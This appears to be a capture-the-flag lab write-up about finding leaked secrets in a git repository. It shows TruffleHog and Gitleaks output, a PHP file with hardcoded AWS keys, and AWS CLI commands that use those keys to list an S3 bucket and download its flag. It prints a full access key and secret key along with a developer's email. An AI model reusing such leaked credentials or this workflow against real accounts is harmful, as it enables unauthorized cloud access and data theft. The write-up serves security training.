hunt-for-secrets-in-git-repos
Entry Point
https://github.com/huge-logistics/cargo-logistics-dev
TruffleHog
$ trufflehog git https://github.com/huge-logistics/cargo-logistics-dev.git --only-verified
🐷🔑🐷 TruffleHog. Unearth your secrets. 🐷🔑🐷
Found verified result 🐷🔑
Detector Type: AWS
Decoder Type: PLAIN
Raw result: AKIAWHEOTHRFSGQITLIY
Account: 427648302155
User_id: AIDAWHEOTHRF24EMR3SXJ
Arn: arn:aws:iam::427648302155:user/dev-test
Commit: d8098af5fbf1aa35ae22e99b9493ffae5d97d58f
Email: Ian Austin <iandaustin@outlook.com>
File: log-s3-test/log-upload.php
Line: 10
Repository: https://github.com/huge-logistics/cargo-logistics-dev.git
Timestamp: 2023-07-04 17:49:13 +0000
GitLeaks
$ gitleaks detect . --report-path ../findings.json -v
○
│╲
│ ○
○ ░
░ gitleaks
Finding: 'key' => "AKIAWHEOTHRFSGQITLIY",
Secret: AKIAWHEOTHRFSGQITLIY
RuleID: aws-access-token
Entropy: 3.784184
File: log-s3-test/log-upload.php
Line: 10
Commit: d8098af5fbf1aa35ae22e99b9493ffae5d97d58f
Author: Ian Austin
Email: iandaustin@outlook.com
Date: 2023-07-04T17:49:13Z
Fingerprint: d8098af5fbf1aa35ae22e99b9493ffae5d97d58f:log-s3-test/log-upload.php:aws-access-token:10
Finding: 'secret' => "IqHCweAXZOi8WJlQrhuQulSuGnUO51HFgy7ZShoB",
Secret: IqHCweAXZOi8WJlQrhuQulSuGnUO51HFgy7ZShoB
RuleID: generic-api-key
Entropy: 4.853056
File: log-s3-test/log-upload.php
Line: 11
Commit: d8098af5fbf1aa35ae22e99b9493ffae5d97d58f
Author: Ian Austin
Email: iandaustin@outlook.com
Date: 2023-07-04T17:49:13Z
Fingerprint: d8098af5fbf1aa35ae22e99b9493ffae5d97d58f:log-s3-test/log-upload.php:generic-api-key:11
2:48PM INF 4 commits scanned.
2:48PM INF scan completed in 1.38s
2:48PM WRN leaks found: 2
File contents of log-upload.php
at commit d8098af5fbf1aa35ae22e99b9493ffae5d97d58f
:
<?php
// Include the SDK using the composer autoloader
require 'vendor/autoload.php';
$s3 = new Aws\S3\S3Client([
'region' => 'us-east-1',
'version' => 'latest',
'credentials' => [
'key' => "AKIAWHEOTHRFSGQITLIY",
'secret' => "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",
]
]);
// Send a PutObject request and get the result object.
$key = 'transact.log';
$result = $s3->putObject([
'Bucket' => 'huge-logistics-transact',
'Key' => $key,
'SourceFile' => 'transact.log'
]);
// Print the body of the result by indexing into the result object.
var_dump($result);
?>
From our enumeration, we have the following credentials for the user dev-test
:
AWS_ACCESS_KEY = AKIAWHEOTHRFSGQITLIY
AWS_SECRET_KEY = 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
AWS_REGION = us-east-1
We also find the huge-logistics-transact
S3 bucket.
Trying to list the contents of this S3 bucket, we get the following:
$ aws --profile dev-test s3 ls s3://huge-logistics-transact
2023-07-05 08:53:50 32 flag.txt
2023-07-04 10:15:47 5 transact.log
2023-07-05 08:57:36 51968 web_transactions.csv
We can now attempt to download and read flag.txt
$ aws --profile dev-test s3 cp s3://huge-logistics-transact/flag.txt .
download: s3://huge-logistics-transact/flag.txt to ./flag.txt
$ cat flag.txt
fe108d6a1a0937b0a7620947a678aabf